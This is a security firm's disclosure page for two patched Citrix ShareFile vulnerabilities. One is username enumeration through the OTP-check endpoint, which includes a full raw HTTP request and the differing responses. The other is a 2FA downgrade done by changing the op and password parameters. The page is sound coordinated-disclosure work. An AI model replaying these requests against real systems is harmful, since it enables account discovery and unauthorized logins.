Research and Development

Our CVEs


CVE 2019-7217 : Citrix ShareFile User Enumeration

Summary
It is possible to enumerate application username based on different server responses using the request to check the otp code.
No authentication is required.
Tested Versions
Citrix ShareFile through 19.1
Fixed Versions
Citrix ShareFile from version 19.12
Product URLs
https://www.sharefile.com/
Details
It is possible to enumerate application username based on different server responses using the request to check the otp code.
No authentication is required.

Example:
It is possible to enumerate application username based on different server 
responses using the request to check the otp code without user authentication:

Request:

POST /oauth/oauthapi.aspx HTTP/1.1
Host: xxx.sharefile.eu
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://xxx.sharefile.eu/Authentication/Login
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 293
Connection: close
tool=oauth-webpop&fmt=json&op=webflow-verify&username=asd1%40test.com&subdomain=xxx&
response_type=code&client_id=Dzi4UPUAg5l8beKdioecdcnmHUTWWln6&
state=FxwxORudhXUqUh3phnC6Mg%3D%3D&
redirect_uri=https%3A%2F%2Fxxx.sharefile.eu%2Flogin%2Foauthlogin&
h=&requireV3=false&code=123

Response if username is not correct:
{"error":true,"errorMessage":"You are not authorized to 
use this client","errorCode":126}

Response if username is correct:
{"error":true,"errorMessage":"Unable to verify two factor 
code.","errorCode":122}


Timeline
22-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release
CREDIT
Discovered by Armando Huesca and Andrea Pessione of SKIT (Shorr Kan IT Engineering srl)


CVE 2019-7218 : Citrix ShareFile TWO FACTOR AUTHENTICATION DOWNGRADE TO ONE FACTOR

Summary
An attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA).
Tested Versions
Citrix ShareFile through 19.1
Fixed Versions
Citrix ShareFile from version 19.23
Product URLs
https://www.sharefile.com/
Details
An attacker with access to the offline victim’s otp physical token or virtual app (like google authenticator) is able to bypass the first authentication phase (username/password mechanism) and log-in using username/otp combination only (phase 2 of 2FA).
This way, it is possible to downgrade 2FA to 1FA, without knowing the victim’s password.
In order to exploit this vulnerability, attackers should have access to the offline otp token (physical or virtual): it is not possible to gain access if the otp is generated after the phase 1 authentication and sent to the client via SMS or phone call.
This vulnerability takes place because the server does not control that client’s phase 1 authentication succeeded before validating phase 2 authentication (authentication schema).

Example:
An attacker is able to intercept the log-in request with garbage data and use 
this request as base for the attack, changing the op and password parameters as
follows:

Figure 1 - phase 1 default log-in request and response
image1

- change op=webflow-auth with op=webflow-verify

- change password=* with code=[OTP]

In case that the username/otp combination is correct (phase 2 succeeded), 
phase 1 authentication is bypassed and unauthorized access to the 
application is gained by the attacker as shown below:

Figure 2 - evil phase 2 request with modified parameters
image2

Follows the proof of unathorized access to the web application 
by exploiting this vulnerability.

Figure 3 - Unauthorized access to the application
image3

ADVICE:	Make sure that client’s phase 1 authentication 
succeeded before validating phase 2 authentication.


Timeline
28-01-2019 Vendor disclosure
05-02-2019 Acknoledge from vendor
02-05-2019 Public Release
CREDIT
Discovered by Andrea Pessione and Armando Huesca of SKIT (Shorr Kan IT Engineering srl)


New CVEs in the next episode ...